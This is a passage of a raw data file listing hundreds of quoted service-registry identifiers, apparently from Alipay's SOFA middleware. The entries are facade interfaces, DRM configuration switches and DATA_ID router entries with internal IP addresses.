lipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:cloudops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.180.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbreservationprod.common.service.facade.alsc.AlscShopLabelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmTagDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.event.BizMoneyTransferResultEventHandlerForTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_FINSLIP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mbill.common.service.facade.MbillAsyncFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.62.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:antaid_change_sync_check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.ThingShadowAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:apires@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.SecurityProductChecker:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.schedule.rpc.service.ops.SelectFieldService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:revmng-revenueBizAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.anonymouspic.AnonymousPicConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.renderweb:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.loanDisbCmdRunNowWhiteUids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.morderprod.common.service.facade.SalesPlanPrefixService:1.0.0:salesPlanPrefix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antlegalchain.common.service.facade.api.NdaSignConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfmng:name=com.alipay.cfmng.service.client.fundboss.drm.FBLinkReconDrm.openLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:frastress@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.ActivityFacade4Kbt:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.forward.bkloanrepay.api.LoanRiskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.tdm.api.TdmAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyLostInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.AntqConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.fixedRedeemTaskConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.153.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.mybank-test-instance.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffxtrade.common.service.facade.api.FxTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbinteligentpromo.common.service.facade.api.IsvServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfusion.common.service.facade.contentfusion.CardTemplateServiceFacade:1.0:localRenderClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.appops.AppCompositeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventprocessorrecord.EventProcessorRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.nameUnLimitAccumulatedAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcraftsman.common.facade.backend.OpusReviseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.operator.AloneOperatorRZService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.autopilot.AutoPilotConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.bankcardTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FundRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.live.ProdLiveFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopdaemon.common.service.facade.QuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.rule.biz.manager.config.PubConfigResource.pubAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.195.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.archimedes.common.service.facade.api.MigrationToolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ClusterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.scheduler:name=com.alipay.scheduler.route.drm.SchedulerRuleResource.routeRuleInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipackage.common.service.facade.api.PackageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianLiInvokeAppTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.cds.mng.TemplateConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mydgp.common.service.facade.datasync.DataRefluxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:compmng-compensation-auditBatchCallBack-accept@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.activity.ActivityInvitationCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.agentfund.api.AftransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.176.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinpromo.common.service.facade.ks.KsCybFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.LimitCenterCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mrchprod_GRZONE@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.170.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:zfcertifycenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.FieldConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.LimitCumForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iexratecenter.service.facade.api.ExOriginRateMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyuniverse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitAbilityTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestAuditAssistantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.voucher.VcpVoucherDirectUseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechannel.senior.common.service.facade.api.BizChannelConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.paycheckersdk.service.ReversePayCheckerService:1.0:finreconchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservemng.service.facade.api.ReservecenterDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iaassettrans.facade.iaasset.api.IaAssetViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileprod.facade.PersonalInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.chart.meta.ChartDataMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.shared.moneybox.service.facade.MbChildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.shared.repository.CreditorsRightTransferRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.realtimeconfig.facade.GrayScaleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMedicalInvoiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.atd:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fpdecision.platform.common.service.facade.iface.FpdecisionFacade:1.0:fpdecisionFacadeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:edge_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.asset.HealthAssetMessageSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imobilewp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.ddsConsole_ds.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecPositionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.openHomeOperatorLoginSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:overseaprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.openIndirectIsvSelfGrayPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:sesameCredit_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.biz.overview.manager.FirstRecordManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.ContactConfManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_B_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.grsettle.facade.api.sla.EmailNotifierFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.ScoreResultQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accagovernance.service.facade.OnlineTestTraceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkoyzcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instriskcenter.facade.api.InstInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepay.common.service.facade.service.certify.CertifyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.StdInformOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.91.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.keymap.facade.asset.api.TableAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.CacheLoaderIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.110.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamweb.common.service.facade.common.CacheServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.voucherprod.facade.api.stock.VcpVoucherStockQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.grayRoutePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfund.biz.service.impl.test.FacadeTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.charge.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bioperation.service.facade.api.PaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.SchedulerTaskStrategyUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpayprod.common.service.facade.services.DecorationTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.api.business.BizAutoOpenOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.validate.PipelineValidateService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.56.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finrtcalcenter.common.service.facade.test.RealtimeDataTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.face.FaceCertifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.lendpof.LoanApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.2.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.escrowexprod.common.service.facade.EscrowRefundServiceFacade:1.0:dwuniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesecurity.common.service.api.auth.OAuthServiceFacade:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.catalog.CatalogMngConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OLD_CLIENTSERVICE_TEST_1_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:reconciliationLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.activityType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoadTestControlDrm.maxLivingLoanCount4LoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.mif.common.service.facade.MerchantRelationBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcardcenter.biz.event.TestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.RiskQuestionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.AssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.ram.SensitivityLevelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbinteligentpromo.common.service.facade.api.ShopSearchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.issue.template.standard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adc.odps.facade.OdpsPrivateTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.TenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.common.service.medical.InsuranceCardTemplatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorDataStorageNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:taskExecExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.plugin.PluginServiceGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.spi.RecoverServiceFacade:1.0:zskynet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.SidecarOdpAttrRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inspectprod.core.service.integration.file.adapter.FileAdapter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appinspect.facade.AppServiceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserDisturbingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:testservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditcore.fee.service.PcreditFeeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.jointaccount.JointAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimportal.common.service.InsClaimDataWorkProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_WX_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinbaseprod.common.service.facade.api.GinSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dqs.sdk.server.ExportDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.OutCardBizDRM.outCardNoReservedCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkassetmore.common.service.facade.api.FinProtocolServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.signcontract.FintradeInstSignContractFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.casegenerate.caselib.OeEmulatorAppCaseLibDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.195.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insautoagent.common.telworkbench.AutoInsPhoneCallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.plugin.appfuse.facade.service.UnitradeprodAppfuseConsultFacade:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.taobao.film.tfinteraction.api.BlockChainTrAPI:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:asyncPrizeSend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.attachtradeinfo.AirPnrServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dpplanning@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.146.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.common.service.manage.facade.api.dtemplate.ParmTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.smartbiz.process.service.ProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.wireless.IsvCorpSuiteJsapiTicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncAckSpiService:1.0:livetradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.flowctrl6014#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.gmcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mindv.okcourse.service.OkCourseTaskListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.spi.service.MobileSearchSpiService:1.0:contentlib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:before-start@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.RechargeRemindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.CommonContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcore.facade.face.ZFaceService:1.0:zcorebizgpualipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:finprodmngApplyAgreementCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.QuotaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:frdspcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_submit_applyment_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.otp.OtpCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.search.OntologyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxworks.service.facade.InstTransIndicatorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.crystal.drm.domainList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebTransOutConfirmEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReBizRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.snsmessage.SnsMessageProdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DARWIN#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.233.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_adjustLpaOverDraftProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.Se